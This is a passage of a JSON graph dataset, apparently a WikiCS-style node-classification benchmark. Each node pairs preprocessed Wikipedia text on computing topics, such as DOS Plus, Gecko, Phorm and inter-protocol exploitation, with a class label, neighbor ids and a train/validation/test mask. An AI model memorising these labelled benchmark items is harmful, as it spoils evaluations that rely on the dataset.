content 100 languages via google translate integration user accounts annotations notes created saved shared cross references linking related content throughout mgg online links related content rilm abstracts music literature others well interface compatible mobile tablet devices search function hailed powerful easy-to-use tool different options available limiting search results specific search results easily located preview section mgg online based second edition includes continuous updates revisions additions platform allows user access earlier versions revised articles platform currently developed knowledge exchange",
    "neighbors": [
      2624,
      10508,
      4726
    ],
    "mask": "Test"
  },
  {
    "node_id": 4727,
    "label": 2,
    "text": "DOS_Plus:dos plus dos plus erroneously also known dos+ first operating system developed digital research oem support group newbury berkshire uk first released 1985 dos plus 1.0 based cp/m-86 plus combined pcmode emulator concurrent pc dos 4.11 cp/m-86 plus concurrent dos 4.1 still developed us concurrent pc dos 4.11 internationalized bug-fixed version brought forward digital research uk later dos plus 2.x issues based concurrent pc dos 5.0 instead broader picture dos plus seen intermediate step concurrent cp/m-86 dr dos dos plus able run programs written either cp/m-86 ms-dos 2.11 read write floppy formats used systems four cp/m-86 programs multitasked one dos program run time dos plus attempts present command-line interface ms-dos like ms-dos command-line interpreter called codice_1 alternative name codice_2 codice_3 file codice_4 except fiddload extension load field-installable device drivers fidd versions dos plus 2.1 major difference user notice bottom line screen contains status information similar left-hand side status bar shows running processes leftmost one visible screen others running background right-hand side shows keyboard layout use uk8 example printer port assignment keyboard caps lock num lock status current time dos program running status line shown dos programs run background keyboard layout use changed pressing ctrl alt one function keys f1-f5 dos plus contains number extra commands support multitasking features also contains subsets standard dos commands cp/m commands – example built-in codice_5 command codice_6 utility copy files codice_7 command assign one three drives n p directory different drive similar manner ms-dos command codice_8 example cause directory codice_9 appear drive n so-called floating drive feature allows old programs n't support subdirectories work dos plus used make file handling command prompt much easier feature also present concurrent dos multiuser dos system manager 7 real/32 however systems extent concept unused drive letters z except drive letter l dr dos 3.31 6.0 november 1992 updates bdos 6.7 also support including drive letter l later systems 4dos/ndos command processor supports features well floating drives implemented bdos kernel command line shell thus feature also used within dos applications entering directory paths long application parse split dirspec processing using similar feature concurrent dos multiuser dos system manager real/32 dynamically assign floating drive l load path loaded application thereby allowing applications refer files residing load directory standardized drive letter instead fixed absolute path load drive feature makes much easier move software installations across disks without adapt paths overlays configuration files user data stored load directory subsequent directories similar reasons appendage environment block associated loaded applications ms-dos/pc dos 3.0 higher contains reference load path executable however consumes resident memory take advantage support must coded executable whereas dri solutions transparently works kind application another feature resulting bdos internal organization current working directories relative links parent directories theoretically unlimited directory depth supported mentioned operating systems – contrast ms-dos/pc dos dr dos since 1992 ms-dos compatible internal data structure named current directory structure cds limits directory depths maximum 66 characters features attributed fact cp/m concept subdirectories dos emulated operating systems directories translated internal cp/m structures intelligent way dos plus boots single file called either dosplus.sys netplus.sys rather io.sys msdos.sys combination ms-dos file cp/m-86 cmd format structured internally number modules dos plus main operating system rom philips originally developed pc compatible versions supplied amstrad pc1512 t.r.a.n yasmin turbo non-ibm pc compatible bbc master 512 came dos plus 1.2 1.2a 2.1 successor solidisk pc plus also came variant dos plus 1.2a 2.1 dos plus 2.1e/g adaptations apricot act series non-standard 315 kb 720 kb fat12 floppy formats logical sectored fat hard disk format partition type 0xf2 sperry pcs 80186 co-processor boards acorn archimedes a300 a310 well acorn 286 prototypes supported well known operating system versions include",
    "neighbors": [
      3091,
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      5158,
      7217,
      9784,
      10809,
      576,
      10333,
      97,
      5220,
      8298,
      8301,
      2672,
      9329,
      7285,
      9335,
      2168,
      6778,
      1147,
      3197,
      1150,
      2179,
      10883,
      6797,
      3216,
      9363,
      9366,
      6296,
      2201,
      7325,
      9887,
      7847,
      2729,
      7849,
      3248,
      178,
      6837,
      8388,
      9932,
      5840,
      1750,
      7382,
      8410,
      9946,
      2786,
      1253,
      5359,
      4337,
      5363,
      11513,
      2811,
      10499,
      4870,
      6921,
      1804,
      1805,
      273,
      11539,
      2840,
      10016,
      2345,
      11562,
      7983,
      823,
      4409,
      7483,
      7999,
      11075,
      4423,
      2380,
      5457,
      11601,
      10067,
      10068,
      10590,
      10083,
      8551,
      5492,
      1408,
      10113,
      394,
      3978,
      7057,
      11667,
      8092,
      421,
      11184,
      954,
      6075,
      6078,
      9151,
      4548,
      8136,
      9166,
      3056,
      6128,
      6129,
      5619,
      10235
    ],
    "mask": "None"
  },
  {
    "node_id": 4728,
    "label": 8,
    "text": "Gecko_(software):gecko software gecko browser engine developed mozilla used firefox browser thunderbird email client many projects gecko designed support open internet standards used different applications display web pages cases application user interface rendering xul gecko offers rich programming api makes suitable wide variety roles internet-enabled applications web browsers content presentation client/server gecko written c++ javascript since 2016 additionally rust free open-source software subject terms mozilla public license version 2 mozilla officially supports use android linux macos windows development layout engine known gecko began netscape 1997 following company purchase digitalstyle existing netscape rendering engine originally written netscape navigator 1.0 upgraded years slow comply well w3c standards limited support dynamic html lacked features incremental reflow layout engine rearranges elements screen new data downloaded added page new layout engine developed parallel old intention integrate netscape communicator mature stable least one major revision netscape expected released old layout engine switch launch mozilla project early 1998 new layout engine code released open-source license originally unveiled raptor name changed nglayout next generation layout due trademark problems netscape later rebranded nglayout gecko mozilla organization forerunner mozilla foundation initially continued use nglayout name gecko netscape trademark eventually gecko branding october 1998 netscape announced next browser would use gecko still called nglayout time rather old layout engine requiring large parts application rewritten decision popular web standards advocates largely unpopular netscape developers unhappy six months given rewrite also meant work done netscape communicator 5.0 including development mariner improvements old layout engine abandoned netscape 6 first netscape release incorporate gecko released november 2000 name netscape 5 never used gecko development continued applications embedders began make use america online time netscape parent company eventually adopted use compuserve 7.0 aol mac os x products previously embedded internet explorer however exception betas gecko never used main microsoft windows aol client july 15 2003 aol laid remaining gecko developers mozilla foundation formed day became main steward gecko development today gecko developed employees mozilla corporation employees companies contribute mozilla project volunteers outset gecko designed support open internet standards standards gecko supports include gecko also partially supports svg 1.1 svg font color profile animation view cursor modules yet implemented filter text modules partially implemented extensibility module also implemented currently disabled order support web pages designed legacy versions netscape internet explorer gecko supports doctype switching documents modern doctype rendered standards compliance mode follows w3c standards strictly documents doctype older doctype rendered quirks mode emulates non-standard oddities netscape communicator 4.x however 4.x features layers supported gecko also limited support non-standard internet explorer features marquee element codice_1 property though pages explicitly testing codice_1 told supported gecko primarily used web browsers earliest netscape 6 mozilla suite later renamed seamonkey also used mozilla web browser derivatives firefox firefox mobile implementation internet explorer-clone part wine mozilla also uses thunderbird email-client web browsers using gecko include gnu icecat waterfox k-meleon lunascape portable firefox conkeror classilla tenfourfox products using gecko include nightingale instantbird google picture-organization software picasa linux gecko also used sugar olpc xo-1 computer gecko used complete implementation xul xml user interface language gecko currently defines xul specification products historically used gecko include pale moon currently using goanna songbird epiphany known gnome web gnome devhelp replaced gecko webkitgtk sunbird calendar web browsers including swiftfox flock galeon camino minimo beonex communicator kazehakase microb windows platforms gecko depends proprietary compilers thus foss distributions linux include gecko package used windows compatibility layer wine gecko 2.0 version number bumped 5.0 match firefox 5 kept sync major version number firefox thunderbird reflect fact longer separate component netscape era combination poor technical management decisions resulted gecko software bloat thus 2001 apple chose fork khtml gecko create webkit engine safari browser however 2008 mozilla addressed bloat problems resulting big performance improvements gecko october 2016 mozilla announced quantum ongoing project encompassing several software development efforts build next-generation web engine firefox users includes numerous improvements gecko taken experimental servo project firefox 57 also known firefox quantum first shipping november 2017 initial version major components quantum/servo projects enabled include increased performance css gpu rendering components additional components merged servo gecko incrementally future versions quantum mozilla project encompassing several software development efforts build next-generation web engine firefox users includes numerous improvements gecko largely incorporated experimental servo project quantum also includes refinements user interface interactions firefox 57 released november 2017 initial version servo component enabled mozilla dubs several planned future releases firefox quantum 2013 mozilla began experimental servo project engine designed scratch goals improving concurrency parallelism also reducing memory safety vulnerabilities important factor writing servo rust programming language also created mozilla designed generate compiled code better memory safety concurrency parallelism compiled c++ code april 2016 servo needed least several years development become full-featured browser engine thus decision start quantum project bring stable portions servo firefox quantum project composed several sub-projects",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      10791,
      9770,
      5677,
      559,
      4661,
      3639,
      10808,
      3643,
      2108,
      9275,
      64,
      9281,
      5707,
      10834,
      6231,
      8281,
      6747,
      4189,
      1632,
      1642,
      9834,
      10860,
      9841,
      115,
      9843,
      637,
      1664,
      2182,
      6791,
      6797,
      8854,
      11418,
      10910,
      8351,
      7340,
      1713,
      7346,
      9394,
      9908,
      7861,
      185,
      11449,
      4797,
      11466,
      7885,
      11469,
      9424,
      7889,
      4310,
      2777,
      8923,
      6367,
      737,
      4326,
      4331,
      8443,
      9987,
      7943,
      1295,
      7951,
      2836,
      278,
      10006,
      7965,
      7455,
      8994,
      1834,
      823,
      10057,
      11082,
      2893,
      3407,
      10078,
      8557,
      7543,
      6528,
      3971,
      3462,
      8584,
      7572,
      1952,
      5026,
      944,
      5054,
      9152,
      6086,
      4048,
      5078,
      11223,
      479,
      482,
      10722,
      5605,
      487,
      488,
      8169,
      494,
      1520,
      7152,
      6133,
      502,
      5622,
      5114,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 4729,
    "label": 5,
    "text": "Simple_Protocol_for_Independent_Computing_Environments:simple protocol independent computing environments computing spice simple protocol independent computing environments remote-display system built virtual environments allows users view computing desktop environment – computer-server machine also anywhere internet – using wide variety machine architectures qumranet originally developed spice using closed-source codebase 2007 red hat inc acquired qumranet 2008 december 2009 released code open-source license made protocol open standard spice client connection remote desktop server consists multiple data channels run separate tcp unix socket connection data channel designated operate either clear-text tls modes allowing administrator tradeoff security level vs performance tls mode provides strong encryption traffic transmitted data channel addition encryption spice protocol allows choice authentication schemes original spice protocol defined ticket based authentication scheme using shared secret server would generate rsa public/private keypair send public key client client would encrypt ticket password public key send result back server would decrypt verify ticket current spice protocol also allows use sasl authentication protocol thus enabling support wide range admin configurable authentication mechanisms particular kerberos one server implementation exists several programmers developed new implementations spice client-side since open-sourcing spice spice protocol originated provide improved remote desktop capabilities fork kvm codebase",
    "neighbors": [
      10242,
      771,
      3847,
      649,
      9353,
      9868,
      6797,
      1553,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      2974,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      7983,
      562,
      2996,
      9909,
      823,
      10747,
      10171,
      10172,
      3133,
      3006,
      4797,
      5181,
      5437,
      7364,
      2887,
      8520,
      8265,
      9932,
      2509,
      4687,
      10961,
      6098,
      5843,
      11643,
      2904,
      5723,
      8539,
      5469,
      5470,
      5471,
      5472,
      4961,
      5988,
      10341,
      5096,
      9320,
      9834,
      10344,
      11112,
      367,
      8432,
      9455,
      8439,
      4729,
      6651,
      2045,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 4730,
    "label": 3,
    "text": "Philips_VG-8020:philips vg-8020 vg 8020 philips third msx 1 computer vg8000 even printer port vg8010 computers version real keyboard chiclet keyboard like predecessors vg-8020 released 1984 featured zilog z80a microprocessor clocked 3.56 mhz 64kb ram 16kb vram two cartridge slots",
    "neighbors": [
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 4731,
    "label": 2,
    "text": "Chess_Titans:chess titans chess titans chess game 3d graphics developed oberon games included windows vista windows 7 home premium business/professional enterprise ultimate fully animated photorealistic interactive game ten difficulty levels played two participants one player computer game publicly introduced windows vista build 5219 another chess program known simply chess bundled microsoft entertainment pack 4 developed david norris former microsoft employee author chess engine ziggurat game fully animated designed windows aero glass-like view game features photorealistic board rotated 3d themes available chess pieces board showcases 3d capabilities vista game played either mouse keyboard gamepad controller windows also played windows media center using remote control provided tv tuner cards certain laptops well player turn chess titans displays last move made opponent player also click chess piece highlight valid moves piece features turned options dialog box chess titans ten difficulty levels selected options dialog box player also choose whether play black white playing computer first time player prompted choose initial difficulty level beginner level 2 intermediate level 5 advanced level 8 chess titans keeps record many games player drawn lost computer difficulty level two-player game chess board automatically turns 180 degrees opposite player move option turned chess titans saves two-player game scores",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10989,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      6462,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4732,
    "label": 4,
    "text": "Phorm:phorm phorm formerly known 121media digital technology company known contextual advertising software phorm incorporated delaware united states relocated singapore phorm corporation singapore ltd 2012 founded 2002 company originally distributed programs considered spyware made millions dollars revenue stopped distributing programs complaints groups united states canada announced talking several united kingdom internet service providers isps deliver targeted advertising based websites users visited phorm partnered isps oi telefonica brazil romtelecom romania ttnet turkey june 2012 phorm made unsuccessful attempt raise £20 million 20 stake chinese subsidiary company proposed advertising system called webwise behavioral targeting service similar nebuad used deep packet inspection examine traffic phorm said data collected would anonymous would used identify users service would include protection phishing fraudulent collection users personal information nonetheless world wide web creator tim berners-lee others spoke phorm tracking users browsing habits isp bt group criticised running secret trials service uk information commissioner office voiced legal concerns webwise said would legal opt-in service opt-out system european commission called uk protect web users privacy opened infringement proceeding country regard isps use phorm groups including amazon.com wikimedia foundation non-profit organization operates collaborative wiki projects requested opt-out websites scans system phorm changed opt-in policy according phorm ’ website company would collect data users explicitly opted services users provide separate consent web browsing device used phorm ceased trading 14 april 2016 previous incarnation 121media company made products described spyware register 121media distributed program called peopleonpage classified spyware f-secure peopleonpage application built around advertising engine called contextplus contextplus also distributed rootkit called apropos used tricks prevent user removing application sent information back central servers regarding user browsing habits center democracy technology u.s.-based advocacy group filed complaint u.s. federal trade commission november 2005 distribution considered spyware including contextplus stated investigated uncovered deceptive unfair behaviour complaint filed concert canadian internet policy public internet center group filing similar complaint integrated search technologies canadian authorities contextplus shut operations may 2006 stated longer able ensure highest standards quality customer care shutdown came several major lawsuits adware vendors launched september 2007 121media become known phorm admitted company history adware stated closed multimillion-dollar revenue stream peopleonpage toolbar citing consumers ’ identification adware spyware primary cause decision early 2008 phorm admitted editing article wikipedia—removing quotation guardian commercial executives describing opposition towards tracking system deleting passage explaining bt admitted misleading customers covert phorm trials 2007 changes quickly noticed reversed online encyclopedia editors phorm currently resides mortimer street london uk staffing levels around 35 trading phorm shares suspended london aim market 24 february 2016 pending clarification company financial position according phorm unable secure requisite equity funding ... advanced discussions certain shareholders parties regarding possible alternative financing ... guarantee discussions would result funds raised pending conclusion discussions company requested suspension shares trading aim company made loss 32.1 million 2007 loss 49.8 million 2008 loss 29.7 million 2009 2010 means better net loss 27.9 million end 2010 company lost 107 million perceivable revenue stream 2011 phorm reported losses 30.5 million conducted equity placing £33.6 million paid company debt 14 april 2016 phorm board directors announced london stock exchange company ceasing trade shareholders unlikely recover investments according rns number 2561y ftse 13 may 2016 changes ftse uk index series ftse aim all-share index effective start trading 18 may 2016 phorm worked major u.s. british isps—including bt group formerly british telecom virgin media talktalk time owned carphone warehouse —on behavioral targeting advertisement service monitor browsing habits serve relevant advertisements end user phorm say deals would given access surfing habits 70 british households broadband service uses deep packet inspection check content requested web pages compared nebuad front porch service would marketed end-users webwise 2009 bbc took legal advice trade mark webwise would work categorising user interests matching advertisers wish target type user browse 're able categorise internet actions said phorm coo virasb vahidi actually see entire internet company said data collected would completely anonymous phorm would never aware identity user browsed adds phorm advertising categories exclude sensitive terms widely drawn reveal identity user monitoring users browsing phorm even says able offer protection online fraud phishing phorm formerly maintained opt-out policy services however according spokesman phorm way opt-out works means contents websites visited still mirrored system computers users http applications used user computer need configured supplemented add ons opt since declared information commissioner office phorm would legal uk law opt-in service richard clayton cambridge university security researcher attended on-the-record meeting phorm published account advertising system implemented phorm system like many websites uses http cookies small pieces text store user settings company said initial web request redirected three times using http 307 responses within system inspect cookies determine user opted system sets unique phorm tracking identifier uid user collects already exists adds cookie forged appear come requested website analysis titled stealing phorm cookies clayton wrote phorm system stores tracking cookie website visited user pc contains identical copy user uid possible phorm system strips tracking cookies http requests forwarded across internet website server prevent uid sent websites using https would allow websites associate uid details website collects visitor phorm senior vice president technology marc burgess said collected information also includes timestamp burgess said enough information accurately target ad future used find b browsed 2008 phorm considered offering incentive addition phishing protection originally planned means convince end-users opt webwise system alternate incentives suggested toluna.com market research survey carried behalf phorm included phishing protection donation charity free technical support line one pound opted-in users monthly broadband subscriptions following decision wikimedia foundation amazon opt websites profiled phorm webwise system incentive websites remain opted phorm profiling system phorm launched webwise discover korean launch web publisher incentive announced press conference covent garden london 3 june 2009 survey polling firm populus revealed watching demonstration video 66 2,075 individuals polled claimed either like idea like lot website publishers invited upload web widget provide small frame display recommended web links based tracked interests phorm-tracked website visitors whose isp uses phorm deep packet inspection intercept profile web traffic would charge website phorm stand make money webwise discover however plans display targeted adverts future widget would deliver link recommendations user signed targeted advertising phorm-affiliated isp widget would invisible everyone else.. press launch phorm spokespersons admitted present single uk isp website yet signed webwise discover system although emphasised part current korea telecom webwise trials legal advice offered websites considering signing oix system susan singleton open rights group org raised questions phorm legality asked clarification service would work fipr argued phorm online advert system illegal uk nicholas bohm general counsel fipr said need parties consent interception order lawful extremely basic principle within legislation lightly ignored treated technicality open letter information commissioner published fipr web site conservative peer lord northesk questioned whether uk government taking action targeted advertising service offered phorm light questions legality data protection regulation investigatory powers acts 9 april 2008 information commissioner office ruled phorm would legal uk law opt-in service office stated closely monitor testing implementation phorm order ensure data protection laws observed uk home office indicated phorm proposed service legal users give explicit consent office became subject controversy emails phorm released emails showed company edited draft legal interpretation office official responded agree becomes position think clients prospective partners comforted liberal democrat spokeswoman home affairs baroness sue miller considered act collusion fact home office asks company worried actually falling outside laws whether draft interpretation law correct completely bizarre register reported may 2008 phorm logo strongly resembled unrelated uk company called phorm design quoted smaller company owner simon griffiths 've solicitors look say 'd go court phorm obviously big player lot clout 'm small design agency sheffield employs three people 21 september 2010 phorm webwise service also shared name bbc webwise monitoring phorm website using website change detection service alerted interested parties changes 21 september 2010 phorm website edited remove references word 'webwise phorm webwise product become 'phormdiscover office harmonization internal market ohim trade marks designs registration office european union website ctm-online database lists phorm application use 'webwise trade mark name british broadcasting corporation listed opponent grounds 'likelihood confusion city london-based legal firm bristows wrote ohim 22 september 2010 withdrawing bbc opposition saying british broadcasting corporation instructed us request withdrawal opposition b11538985 28 october 2010 bt removed webwise pages company website although 12 november 2010 pages finally confirmed removed forum contributors campaign group called nodpi.org virgin media removed phorm webwise faqs customer-news section european union communications commissioner viviane reding said commission concerned phorm breaching consumer privacy directives called uk government take action protect consumers privacy european commission wrote uk government 30 june 2008 set context eu interest controversy asked detailed questions ahead possible commission intervention required uk respond letter one month sent spokeswoman department business enterprise regulatory reform berr admitted 16 august uk met deadline 16 september berr refused register request release full text reply european commission released statement effect uk authorities consider phorm products capable operated lawful appropriate transparent fashion unsatisfied response european commission wrote uk 6 october martin selmayr spokesman reding information society media directorate-general said us matter finished quite contrary uk government responded november commission sent another letter government january 2009 third letter sent commission satisfied explanations implementation european law context phorm case selmayr quoted register saying european commission investigation regard phorm case still ongoing went say commission may proceed formal action uk authorities provide satisfactory response commission concerns 14 april european commission said opened infringement proceeding united kingdom regarding isps use phorm day response news item register regarding european commission preparations sue uk government phorm said technology fully compliant uk legislation relevant eu directives confirmed berr uk regulatory authorities note suggestion contrary commission statement today however berr denied confirmation responded freedom information foi request also made day january 2012 eu dropped case uk government initial reaction proposed service highlighted deep concerns regards individual privacy property rights data phorm defended technology face called misinformation bloggers claiming threatens users privacy security firms classify phorm targeting cookies adware kaspersky lab whose anti-virus engine licensed many security vendors said would detect cookie adware trend micro said high chance would add detection tracking cookies adware pc tools echoed trend concerns privacy security urging phorm apply opt-in approach specialist anti-spyware firm sunbelt software also expressed concerns saying phorm tracking cookies candidates detection anti-spyware software ross anderson professor security engineering cambridge university said message care privacy use bt virgin talk-talk internet provider added historically anonymising technology never worked even stressed still posed huge privacy issues phorm engaged number public relations advisers including freuds citigate dewe rogerson ex-house commons media adviser john stonborough attempt save reputation engaged audiences via moderated online webchats creator world wide web sir tim berners-lee criticised idea tracking browsing history saying mine ca n't want use something negotiate agree understand 'm getting return also said would change isp introduced phorm system director world wide web consortium berners-lee also published set personal design notes titled snooping explains views commercial use packet inspection references phorm simon davies privacy advocate founding member privacy international said behavioural advertising rather spooky concept many people separate role 80/20 thinking consultancy start-up engaged phorm look system said impressed effort put minimising collection personal information subsequently quoted saying privacy international endorse phorm though applaud number developments process system appear mitigate number core privacy problems profiling retention tracking ... wo n't pi support system works opt-out basis kent ertugrul later said made mistake suggested privacy international endorsed phorm confusion apologise endorsement fact simon davies md 80 20 also director privacy international ertugrul set website called stopphoulplay.com reaction phorm critics alexander hanff marcus williamson ertugrul called hanff serial agitator run campaigns phorm companies procter gamble says williamson trying disgrace ertugrul phorm serial letter writing hanff believes stopphoulplay website statements completely irrelevant campaign backfire ertugrul williamson laments phorm stooped personal smears launched 28 april 2009 stopphoulplay.com discussed petition uk prime minister downing street website originally launched web page claimed website managers 10 downing street recognised mistake allowing misleading petition appear site since provided assurances phorm permit happen day freedom information foi act used request confirmation claim phorm 29 april phorm removed quoted text website replaced nothing prime minister office replied foi request 28 may stating held information relation request concerning phorm claim day site launch bbc correspondent darren waters wrote battle sign ceasefire sides nowiki phorm anti-phorm campaigners /nowiki settling war attrition governments uk eu drawn crossfire site closed september 2009 redirects main phorm site initial denials bt group confirmed ran small scale trial one exchange prototype advertising platform 2007 trial involved tens thousands end users bt customers able opt trial—bt said developing improved non-cookie based opt-out phorm—but decision made post-trial approach register reported bt ran earlier secret trial 2006 intercepted profiled web browsing 18,000 broadband customers technical report states customers participated trial made aware profiling one aims validation affect experience 4 june 2008 copy 52-page report allegedly inside bt titled pagesense external technical validation uploaded wikileaks report angered many members public questions regarding involvement charity ads oxfam make trade fair sos children villages whether made aware ads used many feel highly illegal technical trials fipr nicholas bohm said trials online ad system carried bt involving 30,000 customers potentially illegal bt third trial phorm webwise system repeatedly slipped trial last approximately two weeks 10,000 subscribers originally due start march 2008 pushed april end may yet occur company facing legal action trials phorm carried without user consent 2 september 2008 investigating complaint made anti-phorm protestors city london police met bt representatives informally question secret phorm trials 25 september police announced formal investigation bt secret trials phorm 2006 2007 according alex hanff police said criminal intent behalf bt implied consent service going benefit customers bohm said police response 29 september 2008 announced bt support forum trial phorm webwise system would commence following day bt press officer adam liversage stated bt still working network-level opt-out offered trial opted-out traffic pass webwise system mirrored profiled final full roll-out webwise across bt national network necessarily depend completion work either open rights group urged bt customers participate bt webwise trials saying anti-fraud feature unlikely advantages features already built web browsers subscribers bt forums used beta forums criticise raise concerns bt implementation phorm bt responded statement according kent ertugrul bt would completed rollout software end 2009 wall street journal however reported july 2009 bt plans concentrating opportunities phorm share price fell 40 news 6 july 2009 bt former chief press officer adam liversage described thoughts using twitter year intensive personal-reputation-destroying pr trench warfare comes nothing ended comment phantastic october 2009 sergeant mike reed city london police answered freedom information foi request confirmed crime reference number 5253/08 response stated originally passing case papers crown prosecution service cps december 2008 police asked provide evidence cps october 2009 asked disclose date investigation reopened said instruction cps october 2009 sergeant reed response named officer charge d/s murray 25 february 2010 reported cps continued work potential criminal case bt secret trials phorm system prosecutors considered whether press criminal charges unnamed individuals part regulation investigatory powers act april 2011 cps decided prosecute would public interest stating neither phorm bt acted bad faith penalty imposed would nominal april 2012 reports said officer city london police taken lunch phorm police spokesperson quoted saying aware allegation formal complaint received force reviewing information available deciding best course action spokesperson also highlighted city london police involved investigation bt phorm decision investigate prompted cps advice advertisers initially expressed interest phorm include financial times guardian universal mccann myspace ivillage mgm omd virgin media unanimis guardian withdrawn targeted advertising deal phorm email reader advertising manager simon kilby stated true conversations phorm regarding services concluded time want part network decision small part conversations internally product sits values company response article published register 26 march 2008 phorm stated myspace joined oix publisher financial times decided participate phorm impending trial org jim killock said many businesses think commercial data relationships simply private customers decide might even believe data spied upon form industrial espionage david evans british computer society questioned whether act publishing website net giving consent advertisers make use site content monitor site interactions customers pete john created add called dephormation servers web users opt remain opted-out system however john ultimately recommends users switch phorm-equipped internet providers dephormation solution fig leaf privacy rely dephormation protect privacy security need find new isp april 2009 amazon.com announced would allow phorm scan domains wikimedia foundation also requested opt-out scans took necessary steps block wikimedia wikipedia domains processed phorm system 16th month july 2009 nationwide building society confirmed would prevent phorm scanning website order protect privacy customers metrofi american municipal wireless network provider linked phorm ceased operations 2008 three isps linked phorm changed clarified plans since first signing company response customer concerns talktalk said implementation would opt-in opposed bt opt-out n't opt traffic split avoid contact webwise phorm server july 2009 company confirmed would implement phorm charles dunstone boss parent company told times going phorm bt whole industry interested enough business news magazine new media age reported 23 april virgin media moved away phorm expected sign deal another company named audience science bt would meet advertising companies gain isp calls general market intelligence phorm nma called moves shift strategy two media companies day later magazine said companies relationships phorm actually remain unchanged although virgin media reported moved away phorm november 2010 uk-based isp still carry information phorm webwise system website addition phorm partners international isps oi telefónica brazil ttnet-türk telekom turkey romtelecom romania phorm announced beginning market trial south korea via london stock exchange regulatory news service rns 30 march 2009 subsequently announced via rns 21 may 2009 commenced trial 8 july 2009 phorm indicated trials proceeding expected notice 2009 interim report accounts published 14 september 2009 phorm stated nearing completion substantial market trial launched may kt largest isp south korea existence trial south korea publicised ohmynews 2 september 2009 9 september 2009 ohmynews announced trial shut 26 march 2010 phorm announced plans commercial deployment brazil may 2012 brazilian internet steering committee issued resolution recommending use phorm products internet service providers country citing privacy risks concerns phorm products would degrade quality internet services respect proposed partnership telemar known oi claim ig web portal 5 penetration market phorm clear r 400 million last year since launching ttnet subsidiary türk telecom group turkey 2012 phorm launched platform five additional isps accordingly global basis 20 million daily users phorm platform according rns number 3504c 16 january 2015 phorm moved remote cookie option whilst scaling back operations turkey phorm announced 3 october 2013 launched operationally china commenced nationwide opt-in process company announced commenced commercial operations china serving advertisements paid basis privacy concerns china hong kong growing significant developments privacy regulation could impact phorm operations mainland hong kong may 2012 mainland china passed new regulations implement measures protecting consumer privacy commercial exploitation privacy legislation arrived april 2013 publication two draft rules ministry industry information technology provisions protection personal information telecommunications provisions telecommunications internet users internet users provisions registration true identity information phone users provisions phone users along draft amendments 1993 law consumer rights laws emerging e-commerce china becomes increasingly significant part chinese economy new regulations include provisions regulating data collection smart devices discussed article published international association privacy professionals privacy tracker blog called making sense china new privacy laws hong kong office privacy commissioner personal data pcpd taken robust approach protection consumer privacy seek enforce provisions personal data privacy amendment ordinance 2012 amendment ordinance came force april 2013",
    "neighbors": [
      7809,
      9537,
      8807,
      5133,
      877,
      124,
      10417,
      119,
      10392,
      3452,
      7965,
      7710,
      9791
    ],
    "mask": "None"
  },
  {
    "node_id": 4733,
    "label": 4,
    "text": "Inter-protocol_exploitation:inter-protocol exploitation inter-protocol exploitation class security vulnerabilities takes advantage interactions two communication protocols example protocols used internet commonly discussed context hypertext transfer protocol http attack uses potential two different protocols meaningfully communicating commands data popularized 2007 publicly described research year general class attacks refers known since least 1994 see security considerations section rfc 1738 internet protocol implementations allow possibility encapsulating exploit code compromise remote program uses different protocol inter-protocol exploitation utilize inter-protocol communication establish preconditions launching inter-protocol exploit example process could negotiate initial authentication communication vulnerability password parsing inter-protocol exploitation one protocol attacks service running different protocol legacy problem specifications protocols take consideration attack type two protocols involved vulnerability termed carrier target carrier encapsulates commands and/or data target protocol used communication intended victim service inter-protocol communication successful carrier protocol encapsulate commands and/or data sufficiently meaningfully communicate target service two preconditions need met successful communication across protocols encapsulation error tolerance carrier protocol must encapsulate data commands manner target protocol understand highly likely resulting data stream induce parsing errors target protocol target protocol must sufficiently forgiving errors inter-protocol connection likely percentage communication invalid cause errors meet precondition target protocol implementation must continue processing despite errors one major points concern potential attack vector reach firewalls dmzs inter-protocol exploits transmitted http launched web browsers internal subnet important point web browser exploited conventional means javascript delivered http communicating irc protocol known examples vulnerability also demonstrated files constructed valid html code bmp image time",
    "neighbors": [
      5636,
      8998,
      3473,
      3956,
      5399,
      4797
    ],
    "mask": "None"
  },
  {
    "node_id": 4734,
    "label": 3,
    "text": "User-mode_Linux:user-mode linux user-mode linux uml enables multiple virtual linux kernel-based operating systems known guests run application within normal linux system known host guest normal application running process user space approach provides user way running multiple virtual linux machines single piece hardware offering isolation generally without affecting host environment configuration stability numerous things become possible use uml one run network services uml environment remain totally sequestered main linux system uml environment runs administrators use uml set honeypots allow one test security one computers network uml serve test debug new software without adversely affecting host system uml also used teaching research providing realistic linux networked environment high degree safety uml environments host guest kernel versions n't need match entirely possible test bleeding edge version linux user-mode system running much older kernel uml also allows kernel debugging performed one machine kernel debugging tools kgdb require two machines connected null modem cable web hosting providers offer uml-powered virtual servers lower prices true dedicated servers customer root access appears system reality one physical computer shared many people libguestfs supported uml backend since version 1.24 alternative using qemu kvm uml guest application linux binary elf originally available patch kernel versions 2.2.x host kernel version 2.2.x supported easily thread mode i.e. non-skas3 linux 2.6.0 integrated main kernel source tree method running separate kernel address space skas require host kernel patching implemented improves performance security old traced thread approach processes running uml share address space host point view leads memory inside 